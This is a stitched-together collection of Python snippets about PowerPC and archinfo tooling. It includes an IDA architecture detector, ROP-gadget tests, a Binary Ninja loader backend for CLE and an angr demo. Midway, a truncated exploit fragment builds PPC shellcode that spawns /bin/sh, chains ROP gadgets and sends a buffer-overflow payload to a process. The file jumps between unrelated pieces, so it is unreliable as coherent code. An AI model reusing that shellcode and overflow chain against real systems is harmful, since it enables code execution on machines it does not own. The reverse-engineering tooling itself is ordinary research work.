def get_hardware_mode(): (arch, mode) = (None, None) info = idaapi.get_inf_structure() # heuristically detect hardware setup info = idaapi.get_inf_structure() try: cpuname = info.procname.lower() except: cpuname = info.procName.lower() try: # since IDA7 beta 3 (170724) renamed inf.mf -> is_be()/set_be() is_be = idaapi.cvar.inf.is_be() except: # older IDA versions is_be = idaapi.cvar.inf.mf # print("Keypatch BIG_ENDIAN = %s" %is_be) if cpuname == "metapc": if info.is_64bit(): arch = archinfo.ArchAMD64() mode = KS_MODE_64 elif info.is_32bit(): arch = archinfo.ArchX86() mode = KS_MODE_32 else: arch = archinfo.ArchNotFound() mode = KS_MODE_16 elif cpuname.startswith("ppc"): if info.is_64bit(): arch = archinfo.ArchPPC64() mode = KS_MODE_PPC64 else: arch = archinfo.ArchPPC32() mode = KS_MODE_PPC32 if cpuname == "ppc": # do not support Little Endian mode for PPC mode += KS_MODE_BIG_ENDIAN elif cpuname.startswith("mips"): if info.is_64bit(): arch = archinfo.ArchMIPS64() mode = KS_MODE_MIPS64 else: arch = archinfo.ArchMIPS32() mode = KS_MODE_MIPS32 elif cpuname.startswith("systemz") or cpuname.startswith("s390x"): arch = archinfo.ArchS390X() mode = KS_MODE_BIG_ENDIAN return (arch, mode)
def test_ppc_le(self): tests = [ ( { LoadMem: 1 }, '\x08\x00\xe1\x83' + # lwz r31,8(r1) '\x04\x00\x01\x80' + # lwz r0,4(r1) '\xa6\x03\x08\x7c' + # mtlr r0 '\x10\x00\x21\x38' + # addi r1,r1,16 '\x20\x00\x80\x4e'), # blr ] self.run_test(archinfo.ArchPPC32(), tests)
def test_ppc_be(self): tests = [ ( { LoadMem: 2, LoadMultiple: 1 }, '\x80\x01\x00\x1c' + # lwz r0,28(r1) '\x80\x61\x00\x08' + # lwz r3,8(r1) '\x80\x81\x00\x0c' + # lwz r4,12(r1) '\x38\x21\x00\x20' + # addi r1,r1,32 '\x7c\x08\x03\xa6' + # mtlr r0 '\x4e\x80\x00\x20'), # blr ] self.run_test(archinfo.ArchPPC32('Iend_BE'), tests)
def test_ppc(self): arch = archinfo.ArchPPC32() tests = [ ( [ '\x08\x00\xe1\x83\x04\x00\x01\x80\xa6\x03\x08\x7c\x10\x00\x21\x38\x20\x00\x80\x4e' ], # lwz r31,8(r1); lwz r0,4(r1); mtlr r0; addi r1,r1,16; blr LoadMem, ['r1'], ['r31'], [8], ['r0', 'lr'], 0x10, 0x4, True), ] self.run_test(arch, tests)
class BinjaBin(Backend): """ Get information from binaries using Binary Ninja. Basing this on idabin.py, but will try to be more complete. TODO: add more features as Binary Ninja's feature set improves """ is_default = True # Tell CLE to automatically consider using the BinjaBin backend BINJA_ARCH_MAP = { "aarch64": archinfo.ArchAArch64(endness='Iend_LE'), "armv7": archinfo.ArchARMEL(endness='Iend_LE'), "thumb2": archinfo.ArchARMEL(endness='Iend_LE'), "armv7eb": archinfo.ArchARMEL(endness='Iend_BE'), "thumb2eb": archinfo.ArchARMEL(endness='Iend_BE'), "mipsel32": archinfo.ArchMIPS32(endness='Iend_LE'), "mips32": archinfo.ArchMIPS32(endness='Iend_BE'), "ppc": archinfo.ArchPPC32(endness="Iend_BE"), "ppc_le": archinfo.ArchPPC32(endness="Iend_LE"), "x86": archinfo.ArchX86(), "x86_64": archinfo.ArchAMD64() } def __init__(self, binary, *args, **kwargs): super().__init__(binary, *args, **kwargs) if not bn: raise CLEError(BINJA_NOT_INSTALLED_STR) # get_view_of_file can take a bndb or binary - wait for autoanalysis to complete self.bv = bn.BinaryViewType.get_view_of_file(binary, False) l.info("Analyzing %s, this may take some time...", binary) self.bv.update_analysis_and_wait() l.info("Analysis complete") # Note may want to add option to kick off linear sweep try: self.set_arch(self.BINJA_ARCH_MAP[self.bv.arch.name]) except KeyError: l.error("Architecture %s is not supported.", self.bv.arch.name) for seg in self.bv.segments: l.info("Adding memory for segment at %x.", seg.start) br = bn.BinaryReader(self.bv) br.seek(seg.start) data = br.read(len(seg)) self.memory.add_backer(seg.start, data) self._find_got() self._symbol_cache = {} self._init_symbol_cache() # Note: this represents the plt stub. ImportAddressSymbol refers to .got entries # Since we're not trying to import and load dependencies directly, but want to run SimProcedures, # We should use the binaryninja.SymbolType.ImportedFunctionSymbol # Also this should be generalized to get data imports, too self.raw_imports = { i.name: i.address for i in self.bv.get_symbols_of_type( bn.SymbolType.ImportedFunctionSymbol) } self._process_imports() self.exports = {} self.linking = "static" if len(self.raw_imports) == 0 else "dynamic" # We'll look for this attribute to see if we need to do SimProcedures for any imports in this binary # This is an ugly hack, but will have to use this for now until Binary Ninja exposes dependencies self.guess_simprocs = True self.guess_simprocs_hint = "nix" if self.bv.get_section_by_name( ".plt") else "win" l.warning("This backend is based on idabin.py.\n\ You may encounter unexpected behavior if:\n\ \tyour target depends on library data symbol imports, or\n\ \tlibrary imports that don't have a guess-able SimProcedure\n\ Good luck!") def _process_imports(self): ''' Process self.raw_imports into list of Relocation objects ''' if not self.raw_imports: l.warning( "No imports found - if this is a dynamically-linked binary, something probably went wrong." ) for name, addr in self.raw_imports.items(): BinjaReloc(self, self._symbol_cache[name], addr) def _init_symbol_cache(self): # Note that we could also access name, short_name, or full_name attributes for sym in self.bv.get_symbols(): cle_sym = BinjaSymbol(self, sym) self._symbol_cache[sym.raw_name] = cle_sym self.symbols.add(cle_sym) def _find_got(self): """ Locate the section (e.g. .got) that should be updated when relocating functions (that's where we want to write absolute addresses). """ sec_name = self.arch.got_section_name self.got_begin = None self.got_end = None try: got_sec = self.bv.sections[self.arch.got_section_name] self.got_begin = got_sec.start self.got_end = got_sec.end except KeyError: l.warning("No got section mapping found!") # If we reach this point, we should have the addresses if self.got_begin is None or self.got_end is None: l.warning("No section %s, is this a static binary ? (or stripped)", sec_name) return False return True @staticmethod def is_compatible(stream): if not bn: return False magic = stream.read(100) stream.seek(0) # bndb files are SQlite 3 if magic.startswith(b"SQLite format 3") and stream.name.endswith( "bndb"): return True return False def in_which_segment(self, addr): """ Return the segment name at address `addr`. """ # WARNING: if there are overlapping sections, we choose the first name. # The only scenario I've seen here is a NOBITS section that "overlaps" with another one, but # I'm not sure if that's a heurstic that should be applied here. # https://stackoverflow.com/questions/25501044/gcc-ld-overlapping-sections-tbss-init-array-in-statically-linked-elf-bin#25771838 seg = self.bv.get_sections_at(addr)[0].name return "unknown" if len(seg) == 0 else seg def get_symbol_addr(self, sym): """ Get the address of the symbol `sym` from IDA. :returns: An address. """ # sym is assumed to be the raw_name of the symbol return self.bv.get_symbol_by_raw_name(sym) def function_name(self, addr): """ Return the function name at address `addr`. """ func = self.bv.get_function_at(addr) if not func: return "UNKNOWN" return func.name @property def min_addr(self): """ Get the min address of the binary. (note: this is probably not "right") """ return self.bv.start @property def max_addr(self): """ Get the max address of the binary. """ return self.bv.end @property def entry(self): if self._custom_entry_point is not None: return self._custom_entry_point + self.mapped_base return self.bv.entry_point + self.mapped_base def get_strings(self): """ Extract strings from binary (Binary Ninja). :returns: An array of strings. """ return self.bv.get_strings() def set_got_entry(self, name, newaddr): """ Resolve import `name` with address `newaddr`. That is, update the GOT entry for `name` with `newaddr`. """ if name not in self.imports: l.warning("%s not in imports", name) return addr = self.imports[name] self.memory.pack_word(addr, newaddr) def close(self): """ Release the BinaryView we created in __init__ :return: None """ self.bv.file.close()
"\x98\xb8\xfe\xfb" + # stb r5,-261(r24) "\x38\x78\xfe\xf4" + # addi r3,r24,-268 "\x90\x61\xff\xf8" + # stw r3,-8(r1) "\x38\x81\xff\xf8" + # addi r4,r1,-8 "\x90\xa1\xff\xfc" + # stw r5,-4(r1) "\x3b\xc0\x01\x60" + # li r30,352 "\x7f\xc0\x2e\x70" + # srawi r0,r30,5 "\x44\x00\x00\x02" + # sc "/bin/shZ" # the last byte becomes NULL ) target_address = buffer_address + 700 print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode), target_address) rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address, archinfo.ArchPPC32('Iend_BE'), logging.DEBUG) payload = 'A' * 512 + 'B' * 0x1c # We need some custom gadgets to fixup the stack because of the PPC function saving the lr above the current stack frame payload += struct.pack(">i", 0x10000670) + "C" * 12 + struct.pack( ">i", 0x1000066c) + "D" * 4 # how annoying payload += rop payload += ((700 - len(payload)) * 'E') + shellcode payload += "JEFF" # To end our input with open("/tmp/rop", "w") as f: f.write(rop) with open("/tmp/payload", "w") as f: f.write(payload) p.writeline(payload)
# Athens 2019, Figure 2. # addi r3, r3, 0x1 # put X in r3, execute, find X+1 in r3 import angr import pyvex import archinfo import claripy import pdb arch = archinfo.ArchPPC32(archinfo.Endness.BE) s = angr.SimState(arch=arch, mode="symbolic") x = s.solver.BVS('X', 32, explicit_name=True) code = bytes(bytearray.fromhex("38630001")) # addi irsb = pyvex.IRSB(code, 0x100, arch, opt_level=0) irsb.pp() s.regs.r3 = x result = angr.SimEngineVEX().process(s, irsb).flat_successors[0] r3 = result.regs.r3 result.regs.__dir__() print "*************************" print r3
def skip_test_ppc(self): arch = archinfo.ArchPPC32() tests = [ ] self.run_test(arch, tests)